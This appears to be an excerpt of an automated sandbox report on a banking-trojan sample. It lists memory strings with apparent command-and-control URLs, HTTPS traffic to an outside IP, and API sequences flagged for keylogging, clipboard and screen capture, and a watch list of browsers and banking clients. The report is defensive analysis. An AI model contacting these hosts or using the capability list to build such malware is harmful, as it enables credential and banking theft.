    Source: svchost.exe, 00000001.00000003.2789398526.000000000BE37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573946448.00000000072C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518437809.000000000BE77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2477099031.000000000BE37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtv
    Source: svchost.exe, 00000001.00000003.2551947456.000000000BEB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comty
    Source: svchost.exe, 00000001.00000003.2479723300.000000000738D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2206110408.0000000007253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2736488902.000000000733B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lysyvan.com/
    Source: svchost.exe, 00000001.00000003.2636355921.00000000073D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646318980.0000000005F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2659460400.0000000005FCE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797346749.000000000725F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737945629.0000000005F42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2658778836.0000000005F4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2055988879.0000000007367000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1770490293.000000000BE20000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1797346749.000000000725A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1770263179.00000000073D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2200666971.00000000073D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://qegyhig.com/login.php
    Source: unknownNetwork traffic detected: HTTP traffic on port 55363 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 55335 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54059
    Source: unknownNetwork traffic detected: HTTP traffic on port 54050 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54057
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55335
    Source: unknownNetwork traffic detected: HTTP traffic on port 54059 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54057 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55363
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54050
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55332
    Source: unknownNetwork traffic detected: HTTP traffic on port 55332 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55360
    Source: unknownNetwork traffic detected: HTTP traffic on port 55360 -> 443
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55332 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55335 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55360 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:55363 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:54050 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:54059 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Contains functionality to capture and log keystrokes
    Source: C:\Windows\apppatch\svchost.exeCode function: [tab]1_2_02CA2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: [del]1_2_02CA2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: [del]1_2_02CA2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: [ins]1_2_02CA2F40
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA3220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock,1_2_02CA3220
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C99530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_02C99530
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 5_2_02F69530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_02F69530
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_02559530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,6_2_02559530
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,8_2_025C9530
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CB54A0 PathAddBackslashA,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,1_2_02CB54A0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA2F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,1_2_02CA2F40

    E-Banking Fraud

    barindex
    Checks if browser processes are running
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02CA78A0
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02CA78A0
    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02CA78A0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe1_2_02CA6CA0
    Source: C:\Windows\apppatch\svchost.exeCode function: GetCommandLineA,StrStrIA,memset,IsUserAnAdmin,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe1_2_02CA1900
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02C93610
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02C93610
    Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex1_2_02C93610
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F778A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F778A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex5_2_02F778A0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrI